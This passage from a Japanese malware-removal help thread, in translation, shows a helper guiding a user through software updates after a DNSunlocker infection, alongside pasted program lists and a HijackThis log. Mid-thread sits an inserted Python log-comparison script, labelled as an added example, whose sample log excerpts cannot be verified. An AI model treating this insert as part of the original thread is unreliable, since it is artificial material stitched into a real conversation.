Intel(R) Processor Graphics Intel Corporation 2015/11/06 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 2015/11/06 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2015/11/06 10.6 MB 1.23.605.1
Janetter 4.3.1.0 Jane, Inc. 2015/11/06
Launch Manager Acer Inc. 2015/11/06 5.1.15
Microsoft Security Essentials Microsoft Corporation 2015/11/06 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2012/06/20 20.4 MB 4.0.50401.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/06/20 300 KB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2015/11/06 708 KB 8.0.56336
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2015/11/06 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2015/11/06 592 KB 9.0.30729.4148
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 13.6 MB 10.0.30319
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 11.0 MB 10.0.30319
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
newsXpresso esobi Inc. 2012/06/20 7.34 MB 1.0.0.40
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2015/11/06 0.96 GB 9.0.2.9006
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2015/11/06 6.0.1.6543
Skype(TM) 5.5 Skype Technologies S.A. 2012/06/20 17.0 MB 5.5.117
Welcome Center Acer Incorporated 2015/11/06 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2015/11/06 13.2 MB 2.5.1.0



cc windows -----------------------------

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKLM:Run Adobe ARM Adobe Systems Incorporated "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
有効 HKLM:Run BackupManagerTray NTI Corporation "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
有効 HKLM:Run Broadcom Wireless Manager UI Broadcom Corporation C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRAY.exe
有効 HKLM:Run ETDCtrl ELAN Microelectronics Corp. %ProgramFiles%\Elantech\ETDCtrl.exe
有効 HKLM:Run HotKeysCmds Intel Corporation C:\Windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\Windows\system32\igfxtray.exe
有効 HKLM:Run IntelTBRunOnce Microsoft Corporation wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs"
有効 HKLM:Run LManager Dritek System Inc. C:\Program Files (x86)\Launch Manager\LManager.exe
有効 HKLM:Run MSC Microsoft Corporation "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
有効 HKLM:Run Norton Online Backup Symantec Corporation C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
有効 HKLM:Run Persistence Intel Corporation C:\Windows\system32\igfxpers.exe
有効 HKLM:Run Power Management Acer Incorporated C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe
有効 HKLM:Run RTHDVCPL Realtek Semiconductor C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
有効 HKLM:Run SuiteTray Egis Technology Inc. "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"




cc ie----------------------------

有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Helper Adobe PDF Link Helper Adobe Systems Incorporated C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
有効 Helper Windows Live ID Sign-in Helper Microsoft Corp. C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
有効 Helper Windows Live ID サインイン ヘルパー Microsoft Corp. C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll



cc chrome -----------------------------------

有効 App Gmail 8.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0
有効 App Google Search 0.0.0.60 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.60_0
有効 App Google ドライブ 14.1 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0
有効 App YouTube 4.2.8 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0
有効 Extension Adblock Plus 1.9.3 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9.3_0
有効 Extension FireShot - ウェブページのスクリーンショットをキャプチャ 0.98.80 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.80_0
有効 Extension Gestures for Google Chrome™ 1.13.4 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0
有効 Extension Google オフライン ドキュメント 1.0 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.0_1
有効 Extension グランブルーファンタジー[ChromeApps版] 1.2.7 最初のユーザー C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.7_0



cc scheduled tasks----------------------------

有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task EgisUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\EgisUpdate.exe" -d
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PMMUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\PMMUpdate.exe"
有効 Task UALU notificatin Acer Incorporated "C:\Program Files\Acer\Acer Updater\UALU.exe"



cc context menu--------------------------------

有効 File MWLIVShellExt Egis Technology Inc. C:\Program Files (x86)\EgisTec MyWinLocker\x64\MWLIVShellExt.dll
有効 File ShredderContextMenu Egis Technology Inc. C:\Program Files (x86)\EgisTec Shredder\x64\ShredderContextMenu.dll
  • あすとろ
  • 2015/11/06 (Fri) 05:28:51
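Let's review the various updates
Good evening.
So the recovery is done.
I have looked at the current logs.

Now let's fix the issues that still remain.

First, please run the IE update again.
It still appears to be the old version 9.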
>Platform: Windows 7 SP1 (WinNT 6.00.3505)
>MSIE: Internet Explorer v9.00 (9.00.8112.16421)

Next, the applications below have not been updated yet, so update these to the latest versions too.
>Adobe Flash Player 11 ActiveX 64-bit Adobe Systems Incorporated 2015/11/06 6.00 MB 11.2.202.235
>Skype(TM) 5.5 Skype Technologies S.A. 2012/06/20 17.0 MB 5.5.117

And I recommend uninstalling the following using GU.
>Adobe Reader X (10.1.0) MUI Adobe Systems Incorporated 2012/06/20 477 MB 10.1.0

Once it is removed, it is a good idea to install the following as a replacement PDF application.
http://www.forest.impress.co.jp/library/software/pdfxchange/

Once you have done all this, take just the install-info log again and reply with it together with a report on the current state.
  • 悪代官
  • 2015/11/06 (Fri) 22:01:29
Re: DNSunlocker infection
Sorry for the delay. The updates are done, so I am posting the log.


7-Zip 15.10 beta (x64) Igor Pavlov 2015/11/07 4.70 MB 15.10
Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer Crystal Eye Webcam CyberLink Corp. 2015/11/06 41.3 MB 1.5.2108.00
Acer ePower Management Acer Incorporated 2015/11/06 6.00.3010
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2015/11/06 1.04.3507
Acer ScreenSaver Acer Incorporated 2015/11/06 20.11.1107.1418
Acer Updater Acer Incorporated 2012/06/20 1.02.3501
Adobe Flash Player 19 ActiveX Adobe Systems Incorporated 2015/11/09 17.4 MB 19.0.0.226
Apple Application Support(32 ビット) Apple Inc. 2015/11/06 114 MB 4.1
Apple Application Support(64 ビット) Apple Inc. 2015/11/06 128 MB 4.1
Apple Mobile Device Support Apple Inc. 2015/11/06 28.0 MB 9.1.0.6
Apple Software Update Apple Inc. 2015/11/06 2.40 MB 2.1.4.131
Bonjour Apple Inc. 2015/11/06 2.01 MB 3.1.0.1
BookLive!Reader BookLive 2012/06/20 87.2 MB 1.8.10
Broadcom Card Reader Driver Installer Broadcom Corporation 2015/11/06 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 2015/11/06 5.100.82.120
CCleaner Piriform 2015/11/06 5.11
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
Dropbox Dropbox, Inc. 2015/11/08 3.10.11
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2015/11/06 10.6.9.9
Google Chrome Google Inc. 2015/11/06 48.0.2552.0
Identity Card Acer Incorporated 2015/11/06 1.00.3501
Intel(R) Control Center Intel Corporation 2015/11/06 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 2015/11/06 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation 2015/11/06
Intel(R) Processor Graphics Intel Corporation 2015/11/06 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 2015/11/06 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2015/11/06 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/11/06 218 MB 12.3.1.23
Jane Style Version 3.83 Jane, Inc. 2015/11/08 3.83
Janetter 4.3.1.0 Jane, Inc. 2015/11/06
Launch Manager Acer Inc. 2015/11/06 5.1.15
Logicool ゲームソフトウェア 8.72 Logicool 2015/11/06 160 MB 8.72.107
Microsoft .NET Framework 4 Client Profile Language Pack - 日本語 Microsoft Corporation 2015/11/07 2.93 MB 4.0.30319
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/11/07 38.8 MB 4.5.51209
Microsoft OneDrive Microsoft Corporation 2015/11/08 36.8 MB 17.3.6201.1019
Microsoft Security Essentials Microsoft Corporation 2015/11/06 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/11/06 50.7 MB 5.1.40728.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/06/20 300 KB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2015/11/06 708 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2015/11/06 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2015/11/07 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2015/11/06 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2015/11/07 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 13.7 MB 10.0.30319
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 11.0 MB 10.0.30319
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 Microsoft Corporation 2015/11/06 20.5 MB 12.0.30501.0
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
newsXpresso esobi Inc. 2012/06/20 7.34 MB 1.0.0.40
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2015/11/06 0.96 GB 9.0.2.9006
PDF-Viewer Tracker Software Products Ltd 2015/11/09 52.8 MB 2.5.315.0
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2015/11/06 6.0.1.6543
Skype(TM) 7.0 Skype Technologies S.A. 2015/11/07 47.9 MB 7.0.102
Welcome Center Acer Incorporated 2015/11/06 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2015/11/06 13.2 MB 2.5.1.0
  • あすとろ
  • 2015/11/09 (Mon) 18:50:01
Remove it once, then reinstall
Sorry for the late reply.

Looking at the log, Adobe has been updated, but Skype is still not the latest.
>Skype(TM) 7.0 Skype Technologies S.A. 2015/11/07 47.9 MB 7.0.102

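Is the update not working properly?
Please double-check just in case.
After doing "Delete Entry" for Skype from GU, install the latest version again from the official site, and let me know whether that brings it up to the latest.
Also, please tell me whether IE has become the latest version, 11.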
  • 悪代官
  • 2015/11/10 (Tue) 22:08:55
Re: DNSunlocker infection
When I checked, an update for Skype had arrived, so I updated it.

I reinstalled IE from the official site, so I believe it is now the latest version.
  • あすとろ
  • 2015/11/12 (Thu) 07:07:06
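Please show me the logs once more, just in case
Good morning.

>When I checked, an update for Skype had arrived, so I updated it.

>I reinstalled IE from the official site, so I believe it is now the latest version.

Right, so the updates went through.
Then let's confirm once more.
Sorry for the trouble, but please take just the HJT and install-info logs again and show them to me.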
  • 悪代官
  • 2015/11/12 (Thu) 07:33:35
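The re-check requested above comes down to comparing a fresh HijackThis log with the previous one: the `MSIE:` header line and the browser-helper (O2) and autostart (O4) entries. The script below is an added example, not part of the original posts; the two samples are shortened excerpts of logs posted in this thread, and the function names and the `LATEST_IE_MAJOR` threshold (taken from the helper's "latest version, 11") are assumptions of the example.

```python
import re

# Shortened excerpts of two HijackThis logs posted in this thread.
SCAN_OLD = r"""Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 5:12:19, on 2015/11/06
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)
Boot mode: Normal

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
"""

SCAN_NEW = r"""Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 2:23:53, on 2015/11/13
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18098)
Boot mode: Normal

F2 - REG:system.ini: UserInit=userinit.exe
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
"""

# Assumption from the helper's reply in this thread: IE 11 is the latest version.
LATEST_IE_MAJOR = 11

ENTRY_RE = re.compile(r"^([FO]\d+) - (.+)$")                        # e.g. "O4 - HKLM\..\Run: ..."
HEADER_RE = re.compile(r"^(Platform|MSIE|Scan saved at)\b:?\s*(.+)$")


def parse_hjt(text):
    """Split one log into header fields and entries grouped by section code."""
    header, entries = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        m = ENTRY_RE.match(line)
        if m:
            entries.setdefault(m.group(1), []).append(m.group(2))
            continue
        m = HEADER_RE.match(line)
        if m:
            header[m.group(1)] = m.group(2)
    return {"header": header, "entries": entries}


def ie_major(scan):
    """Major IE version from the build number in parentheses, or None if absent."""
    m = re.search(r"\((\d+)\.", scan["header"].get("MSIE", ""))
    return int(m.group(1)) if m else None


def diff_entries(old, new, sections=("O2", "O4")):
    """Entries in the chosen sections that disappeared or appeared between scans."""
    removed, added = [], []
    for code in sections:
        before = old["entries"].get(code, [])
        after = new["entries"].get(code, [])
        removed += [f"{code} - {e}" for e in before if e not in after]
        added += [f"{code} - {e}" for e in after if e not in before]
    return removed, added


def summarize(old, new):
    """Human-readable summary: IE state per scan, then removed and added entries."""
    lines = []
    for label, scan in (("old", old), ("new", new)):
        major = ie_major(scan)
        if major is None:
            state = "unknown"
        else:
            state = "current" if major >= LATEST_IE_MAJOR else "outdated"
        when = scan["header"].get("Scan saved at", "?")
        lines.append(f"{label}: scan {when}, IE {major} ({state})")
    removed, added = diff_entries(old, new)
    lines += [f"removed: {e}" for e in removed]
    lines += [f"added:   {e}" for e in added]
    return lines


if __name__ == "__main__":
    for line in summarize(parse_hjt(SCAN_OLD), parse_hjt(SCAN_NEW)):
        print(line)
```

Every added O2 or O4 entry should map to something installed on purpose since the last scan; one that does not is the item to investigate.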
Re: DNSunlocker infection
I am posting the logs.

hjt ------------------------

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 2:23:53, on 2015/11/13
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.18098)


Boot mode: Normal

Running processes:
C:\Users\【ユーザー名】\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Desktop\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: Windows Live ID サインイン ヘルパー - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Dropbox] "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [OneDrive] "C:\Users\【ユーザー名】\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device Service - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: CypherGuard cguard Service 32bit Edition - CypherTec Inc. - C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe
O23 - Service: CypherGuard cguard Service 64bit Edition - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cgrdsrv64.exe
O23 - Service: CypherGuard Info Service - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cthwsrv64.exe
O23 - Service: Dropbox アップデート サービス (dbupdate) (dbupdate) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: Dropbox アップデート サービス (dbupdatem) (dbupdatem) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: ePower Service (ePowerSvc) - Acer Incorporated - C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: Logitech Gaming Registry Service (LogiRegistryService) - Logitech Inc. - C:\Program Files\Logicool Gaming Software\Drivers\APOService\LogiRegistryService.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 9496 bytes


cc -----------------------

7-Zip 15.10 beta (x64) Igor Pavlov 2015/11/07 4.70 MB 15.10
Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer Crystal Eye Webcam CyberLink Corp. 2015/11/06 41.3 MB 1.5.2108.00
Acer ePower Management Acer Incorporated 2015/11/06 6.00.3010
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2015/11/06 1.04.3507
Acer ScreenSaver Acer Incorporated 2015/11/06 20.11.1107.1418
Acer Updater Acer Incorporated 2012/06/20 1.02.3501
Adobe Flash Player 19 ActiveX Adobe Systems Incorporated 2015/11/11 4.48 MB 19.0.0.245
